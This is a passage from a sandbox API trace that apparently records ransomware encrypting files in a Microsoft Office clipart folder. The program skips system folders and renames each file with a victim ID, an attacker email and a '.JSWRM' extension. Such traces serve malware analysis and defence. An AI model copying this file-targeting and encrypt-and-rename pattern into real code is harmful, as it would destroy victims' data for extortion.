lpWideCharStr=0x0) returned 24 [0075.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0075.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0075.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0075.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0075.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0075.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0075.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.783] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x292a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01638_.WMF", cAlternateFileName="")) returned 1 [0075.783] lstrcmpiW (lpString1="BS01638_.WMF", lpString2=".") returned 1 [0075.783] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="..") returned 1 [0075.783] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="...") returned 1 [0075.783] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="windows") returned -1 [0075.784] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="recovery") returned -1 [0075.784] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="perflogs") returned -1 [0075.784] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="documents and settings") returned -1 [0075.784] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.784] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="system volume information") returned -1 [0075.784] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="msocache") returned -1 [0075.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01638_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01638_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01638_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0075.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01638_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01638_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01638_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0075.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.784] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10538) returned 1 [0075.784] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2920) returned 0x24c1d0 [0075.785] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2920, lpOverlapped=0x0) returned 1 [0075.796] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.796] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2920, lpOverlapped=0x0) returned 1 [0075.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.796] CloseHandle (hObject=0x460) returned 1 [0075.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0075.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0075.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0075.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0075.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0075.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.797] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0075.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.798] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x108c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01639_.WMF", cAlternateFileName="")) returned 1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2=".") returned 1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="..") returned 1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="...") returned 1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="windows") returned -1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="recovery") returned -1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="perflogs") returned -1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="documents and settings") returned -1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="system volume information") returned -1 [0075.798] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="msocache") returned -1 [0075.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0075.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01639_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01639_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01639_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0075.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0075.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01639_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01639_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01639_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0075.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.799] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4236) returned 1 [0075.799] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1080) returned 0x24c1d0 [0075.799] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1080, lpOverlapped=0x0) returned 1 [0075.816] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.816] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1080, lpOverlapped=0x0) returned 1 [0075.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.816] CloseHandle (hObject=0x460) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0075.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0075.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0075.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0075.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.817] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0075.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.818] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x246a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CARBN_01.MID", cAlternateFileName="")) returned 1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2=".") returned 1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="..") returned 1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="...") returned 1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="windows") returned -1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="recovery") returned -1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="perflogs") returned -1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="documents and settings") returned -1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="system volume information") returned -1 [0075.818] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="msocache") returned -1 [0075.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CARBN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CARBN_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CARBN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0075.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0075.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CARBN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CARBN_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CARBN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0075.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0075.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.819] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9322) returned 1 [0075.819] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2460) returned 0x24c1d0 [0075.819] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2460, lpOverlapped=0x0) returned 1 [0075.821] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.821] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2460, lpOverlapped=0x0) returned 1 [0075.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.821] CloseHandle (hObject=0x460) returned 1 [0075.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0075.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0075.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0075.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0075.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0075.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 